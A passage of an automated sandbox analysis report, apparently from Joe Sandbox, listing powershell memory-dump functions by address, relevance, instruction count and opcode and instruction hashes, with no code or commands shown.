                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1383664303.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 43c96bc595a4e3015a3688928762d10bfe7823596e49efe7a4223a364a1fd121
                                                                                              • Instruction ID: dd0b54a3589091241b83e5e99668c1c24b1d469e192651dcea2211dbd7c32c56
                                                                                              • Opcode Fuzzy Hash: 43c96bc595a4e3015a3688928762d10bfe7823596e49efe7a4223a364a1fd121
                                                                                              • Instruction Fuzzy Hash: 2A515C3688D7868FD341EF2CE4665F57FA0EF42228B0842F7C089CE163EA146499C7D9
                                                                                              Function 00007FFAAC45A47C Relevance: .1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1383664303.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 820af4df26466e90eaafb78b3fdb367b43e4324a72b00b705c5f11aa198d9b5f
                                                                                              • Instruction ID: d53a28d1a7d0649bd1f6990cc0d02ade54c5e083259d4f206b4bf49673dc44c1
                                                                                              • Opcode Fuzzy Hash: 820af4df26466e90eaafb78b3fdb367b43e4324a72b00b705c5f11aa198d9b5f
                                                                                              • Instruction Fuzzy Hash: 8321093190C74C8FEB59DBAC984A7F97FE0EB96320F04416FD048C3156D6749859C792
                                                                                              Function 00007FFAAC33E41F Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1383263687.00007FFAAC33D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC33D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac33d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                              • Instruction ID: 1424343a7cb94a093150d109bdf428f85765d854f81d31e2dd815da0c771edef
                                                                                              • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                              • Instruction Fuzzy Hash: 4001283260CE088F9BA8EF1EE48595277E0FB98320710469AD41EC765AD631F892CBC1
                                                                                              Function 00007FFAAC4533B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1383664303.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction ID: 39e90d934db2b52d8d465d105b0ea53f64ea8b047cbadeeae84e6d00bb5073a7
                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction Fuzzy Hash: 6101677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                                              Function 00007FFAAC52414D Relevance: .0, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1384037143.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac520000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c8f1981fc8d807c0d157b0ccbbe3ab7ed86bd513b6a78605c1d70427c223fb2
                                                                                              • Instruction ID: 1c7728aef68a6dbf91119811ae9aa7bb3f98bc7797ab96aaaa7cfae950442ce1
                                                                                              • Opcode Fuzzy Hash: 1c8f1981fc8d807c0d157b0ccbbe3ab7ed86bd513b6a78605c1d70427c223fb2
                                                                                              • Instruction Fuzzy Hash: ECF0BE32A4D9458FE758EB5CE4458A873E4EF55320B1180BAE05DC71A3DE25EC44C780
                                                                                              Function 00007FFAAC524400 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1384037143.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac520000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d565aa796c5effdfeceb099ab3597431617c7066121d7f0d4e1f9717692c339
                                                                                              • Instruction ID: cc1c170c3c95ec4c05f6e5ec602fd4d130066646e6b2c4d08497a08f057e921f
                                                                                              • Opcode Fuzzy Hash: 1d565aa796c5effdfeceb099ab3597431617c7066121d7f0d4e1f9717692c339
                                                                                              • Instruction Fuzzy Hash: 97F0E232A4D5858FE758EB1CE4458A877E0FF0532071140B6F04DCB063EB25EC44C780
                                                                                              Function 00007FFAAC5241D1 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1384037143.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffaac520000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction ID: 9095ba97b34b7ab1afb67de5251edf86d47d88ccbbacc0be465c5ba3ea9a4e72
                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction Fuzzy Hash: A0E01A31B4C809CFEA68DB0CE0409A973E5EB9932171141B7E14EC7561DB22EC559BC0

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC56660A Relevance: .4, Instructions: 443COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4028a82c868220e81c696510f19273cf2f0cb9b0711329db5bf61a1eceeadc88
                                                                                              • Instruction ID: bd7fe49ffe56751113d301702c874741e3b214ec6c718aa24d06b3709842f694
                                                                                              • Opcode Fuzzy Hash: 4028a82c868220e81c696510f19273cf2f0cb9b0711329db5bf61a1eceeadc88
                                                                                              • Instruction Fuzzy Hash: 5AC16CB194EA8A8FFB55976898159B5BBE5EF46310B0841BAE00DC71D3DD28EC0983C1
                                                                                              Function 00007FFAAC566660 Relevance: .2, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a85d2eddc01599352433b716d358cced4132e84a8c870ea954ee80ff2eebcb20
                                                                                              • Instruction ID: db19322f863d7cc59aac1274ccea272c7f1a6ccb4a56161c5e905fed5e2cd08e
                                                                                              • Opcode Fuzzy Hash: a85d2eddc01599352433b716d358cced4132e84a8c870ea954ee80ff2eebcb20
                                                                                              • Instruction Fuzzy Hash: 0C7115A6D5EB878FFB9597689855574EAE5EF46310B5C81BAE00DC71C3CD28DC0883C1
                                                                                              Function 00007FFAAC4996D3 Relevance: .2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c8bcad8ffca9462a22027a1d968a157a07060a4499cb8db17e8fd24c8267fa59
                                                                                              • Instruction ID: c743f592371ca705179c55f6d526a8d3605b8f8c26c3fb5c0e8bd6e636ceeec7
                                                                                              • Opcode Fuzzy Hash: c8bcad8ffca9462a22027a1d968a157a07060a4499cb8db17e8fd24c8267fa59
                                                                                              • Instruction Fuzzy Hash: 13713B7290EBC58FF7459B2CA8595E57FA0EF63314F0881BBD08C87293DD19A80987C6
                                                                                              Function 00007FFAAC499885 Relevance: .2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 157b5b725c36b71fd138feb42f56cc5b9c89abc1200d512b43b2dc30b4dac0d6
                                                                                              • Instruction ID: 8ca641ea5447d576b6228732c6efad867a8a177f0460b1a0de7dbfc5840fdb10
                                                                                              • Opcode Fuzzy Hash: 157b5b725c36b71fd138feb42f56cc5b9c89abc1200d512b43b2dc30b4dac0d6
                                                                                              • Instruction Fuzzy Hash: A651A831A1CB488FDB18DF5C984A6A8BBE0FBA5721F00826FD04D93651CB75A456CBC6
                                                                                              Function 00007FFAAC37E620 Relevance: .1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1521835039.00007FFAAC37D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC37D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac37d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a501b219f9f0addf404d0557afc47f06be9c109da96201e2ef2724c2c570bb3c
                                                                                              • Instruction ID: aaa074ab217f8da5a565322206b17a1080743f3f024fac53e3749c197fc9a0e0
                                                                                              • Opcode Fuzzy Hash: a501b219f9f0addf404d0557afc47f06be9c109da96201e2ef2724c2c570bb3c
                                                                                              • Instruction Fuzzy Hash: F341E37140EBC48FE756DB2998459527FF0EF57220B1905DFD088CB1A3D629E84AC7E2
                                                                                              Function 00007FFAAC49A73C Relevance: .1, Instructions: 117COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1abb37816e7ea89106043769c340add82788eecaabe36cca475c38d691caab1e
                                                                                              • Instruction ID: b760c5b35dafe1b3f2530eb8591e66fa6e01b9bc41826f88dc10cf9c30dcac45
                                                                                              • Opcode Fuzzy Hash: 1abb37816e7ea89106043769c340add82788eecaabe36cca475c38d691caab1e
                                                                                              • Instruction Fuzzy Hash: C6312D7180DB888FE759DF6C88496E97FE0EF66320F0481AFD04DC7152D5699849C792
                                                                                              Function 00007FFAAC4933B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction ID: 5910eff218ebdd6503179abbb95655a93dd30ac77fa8d77108b8420d4812b2c2
                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction Fuzzy Hash: A101677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                                              Function 00007FFAAC49A0FB Relevance: .0, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec6f3be936462afc24ec8f204e886b07607c94883416fb2f28d397f93126af0f
                                                                                              • Instruction ID: 2f5492249dcf0887df7425ee999620c3dc05b4eb339c7519044b4cc3d21f820e
                                                                                              • Opcode Fuzzy Hash: ec6f3be936462afc24ec8f204e886b07607c94883416fb2f28d397f93126af0f
                                                                                              • Instruction Fuzzy Hash: 6CF0467240DB8C8FE785DF1CD86A0E97FA0FF66204B0442ABE04CC3122DA22884887C1
                                                                                              Function 00007FFAAC56414D Relevance: .0, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d39cd7bd42d9493500b21c9d82ad64dbe98d7ebddcbc5df83ce69e91726238f5
                                                                                              • Instruction ID: c2fa820e6ac97a6ea504415c137c50930e443fe18f8744298331b4e77df33ace
                                                                                              • Opcode Fuzzy Hash: d39cd7bd42d9493500b21c9d82ad64dbe98d7ebddcbc5df83ce69e91726238f5
                                                                                              • Instruction Fuzzy Hash: A4F09A32A8D5498FE698EB5CE4458A8B3E4EF55320B1580BAE05DC71A3DA25EC448780
                                                                                              Function 00007FFAAC564400 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cdbb9ad172a1a89cd73fa2300b123f85fee859969d9140bbc29125b4fc48cee
                                                                                              • Instruction ID: 959a100f69241aba3830a306378d92a37bddb6c6e79ae45e6035eb6920fa9c9f
                                                                                              • Opcode Fuzzy Hash: 0cdbb9ad172a1a89cd73fa2300b123f85fee859969d9140bbc29125b4fc48cee
                                                                                              • Instruction Fuzzy Hash: FDF0BE32A8D5458FE755EB1CE0468A8B7E0EF05321B1540B6F04DCB063EB26EC44C780
                                                                                              Function 00007FFAAC5641D1 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction ID: 1da8f34a65741406df9eddd08b208f3b426c46e4f43b49e36b255a5874fb2c64
                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction Fuzzy Hash: 44E01A31B4C809CFEAA8DB0CE0409E9B3E5EB9932171541B7E14EC7561DB32EC959BC0

                                                                                              Non-executed Functions

                                                                                              Function 00007FFAAC498945 Relevance: 6.5, Strings: 5, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-3188868157
                                                                                              • Opcode ID: 9881ec8e7097819c6ea7b8c3e6e2495065590a4da6411aa236576168e6e004d0
                                                                                              • Instruction ID: 36d57f1a47eaaddd28bbed7296bd947f3c70c0c17af783fd26f67a503b653ec7
                                                                                              • Opcode Fuzzy Hash: 9881ec8e7097819c6ea7b8c3e6e2495065590a4da6411aa236576168e6e004d0
                                                                                              • Instruction Fuzzy Hash: 595198E390E7D28FF356476C986A1A17FE0EF53219F0981F6C08C8B593ED1D584B8285
                                                                                              Function 00007FFAAC498BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^5$K_^8$K_^F$K_^I$K_^K
                                                                                              • API String ID: 0-34091245
                                                                                              • Opcode ID: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction ID: eb53e693b4954688ab75967ef4b7aac7ecd888228fce8bd35d3999d051cb8d24
                                                                                              • Opcode Fuzzy Hash: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction Fuzzy Hash: 522149B76941265EDA013B7DF859DE877E4DF8427934983B2D198CF213DC14B08B8AC0
                                                                                              Function 00007FFAAC4989F3 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-4267328068
                                                                                              • Opcode ID: 739deb6282d7254de0f4f7dc2f112f81beaeca89dcace504b2787844fd326b2d
                                                                                              • Instruction ID: b6add1fa5694faec7ea0163e869676935914253801d315afe07fdfe5d1252a61
                                                                                              • Opcode Fuzzy Hash: 739deb6282d7254de0f4f7dc2f112f81beaeca89dcace504b2787844fd326b2d
                                                                                              • Instruction Fuzzy Hash: D231C9E390E7D29BF65A071C586A0A56FE0EF6321DB0D82F6C4888A593ED19A9074285

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC553F77 Relevance: .7, Instructions: 695COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0bdcd55bedf5d0c9f93f6cec835f246a126d1966a2d28a806e30ff109e6ae2c8
                                                                                              • Instruction ID: 1242f885a7277808969f102615e3bd1b183a6978355e4497e7b1bfb2bde39251
                                                                                              • Opcode Fuzzy Hash: 0bdcd55bedf5d0c9f93f6cec835f246a126d1966a2d28a806e30ff109e6ae2c8
                                                                                              • Instruction Fuzzy Hash: E412056298E7CA8FF356972898195A43FE5DF53210B0981FFE08DC71A3DE19DC4A8391
                                                                                              Function 00007FFAAC55660A Relevance: .5, Instructions: 456COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94b7cc6e54b5cd2fe1c2d26d4456601b3c8d3de4933738f4f1373855b1f8f385
                                                                                              • Instruction ID: dbf1ce42a7244dce25c1d74ed9d6fe981ee04b73b4da1d219463938643e3830a
                                                                                              • Opcode Fuzzy Hash: 94b7cc6e54b5cd2fe1c2d26d4456601b3c8d3de4933738f4f1373855b1f8f385
                                                                                              • Instruction Fuzzy Hash: 75D167B2A1EACE8FFB55976898155B57BE4EF46310B0441BEE04DC72D3DE19EC098382
                                                                                              Function 00007FFAAC489ED3 Relevance: .3, Instructions: 252COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c8ce1480e43892858619671edf7aa7654ae24e0e8d6a2cc1db63e7b149b3ae42
                                                                                              • Instruction ID: da8a1e55d9f472233359b762f3842686c86fbe043c64710254ce913fcebf3ce7
                                                                                              • Opcode Fuzzy Hash: c8ce1480e43892858619671edf7aa7654ae24e0e8d6a2cc1db63e7b149b3ae42
                                                                                              • Instruction Fuzzy Hash: 8E712CA3909BC28BF3469B5CD86B0F93FE0EF6362EB084076C59886153FD15561A47C6
                                                                                              Function 00007FFAAC48ABF2 Relevance: .2, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd6a426176dfc675962e3630ab61eead64cc0cdb781487167bb99cf24c2a680e
                                                                                              • Instruction ID: cc8325589b65db2eb85ee988a9d0004790602ff6f79ee34b898849a8e072165f
                                                                                              • Opcode Fuzzy Hash: dd6a426176dfc675962e3630ab61eead64cc0cdb781487167bb99cf24c2a680e
                                                                                              • Instruction Fuzzy Hash: 0C41367290DB898FF7549B5CA8AA1F53FE0EF53226F08407BD44CCB253E965941A87C2
                                                                                              Function 00007FFAAC489FF4 Relevance: .1, Instructions: 149COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cb8368b1d320d6ce41efacbc2b75e5dc813eb530d20821481fa3d2a7471c7339
                                                                                              • Instruction ID: 95ef2aefb5b0e9b9e12b2153ce719e494eb92aeaab3400b5868f45a8794e046d
                                                                                              • Opcode Fuzzy Hash: cb8368b1d320d6ce41efacbc2b75e5dc813eb530d20821481fa3d2a7471c7339
                                                                                              • Instruction Fuzzy Hash: 83416BA390DBC28BF342AB5CD85A0F63FE0EF2371AF084077D09892193ED55561A4BC2
                                                                                              Function 00007FFAAC489758 Relevance: .1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 63afe4b067040049b5f6c387b3b52ec86caf18a4d9e8d49374d1f18e6edda527
                                                                                              • Instruction ID: 181f431b689f20fa7cd193b2090fceca0ed294bc34c4b4df199e01d837c28a70
                                                                                              • Opcode Fuzzy Hash: 63afe4b067040049b5f6c387b3b52ec86caf18a4d9e8d49374d1f18e6edda527
                                                                                              • Instruction Fuzzy Hash: 5231DB7191CF489FEB589F5CA84A6F97BE0FBA5310F04812FE04D93252DA30A955CBC6
                                                                                              Function 00007FFAAC36EF00 Relevance: .1, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1702217889.00007FFAAC36D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC36D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac36d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b923b310347225bf049c56c18db471da5bf7b5bcbebe6ec3db52e7fbc00f325e
                                                                                              • Instruction ID: dd56a358cdee63abd1df3214935af350ece4536e34666c8429e366b3da17c298
                                                                                              • Opcode Fuzzy Hash: b923b310347225bf049c56c18db471da5bf7b5bcbebe6ec3db52e7fbc00f325e
                                                                                              • Instruction Fuzzy Hash: 2841087140EBC48FE7569B2898559527FF0EF57320B1A05DFE088CB1A3D625E84AC7E2
                                                                                              Function 00007FFAAC5540BF Relevance: .1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abcf400cf3016eb7f29cd102cc63e0c1df9c67d54c1cf75931335bc8956c4a31
                                                                                              • Instruction ID: 36082633e6b446a9b7e9f1f9f09d12f0d20cdff8900281f98dffd1cf8b50c003
                                                                                              • Opcode Fuzzy Hash: abcf400cf3016eb7f29cd102cc63e0c1df9c67d54c1cf75931335bc8956c4a31
                                                                                              • Instruction Fuzzy Hash: D22106629CEA8F8FF7A9DB1C845557477D5EF56210B5980BEE04ECB1A2CF1ADC088381
                                                                                              Function 00007FFAAC5543BC Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
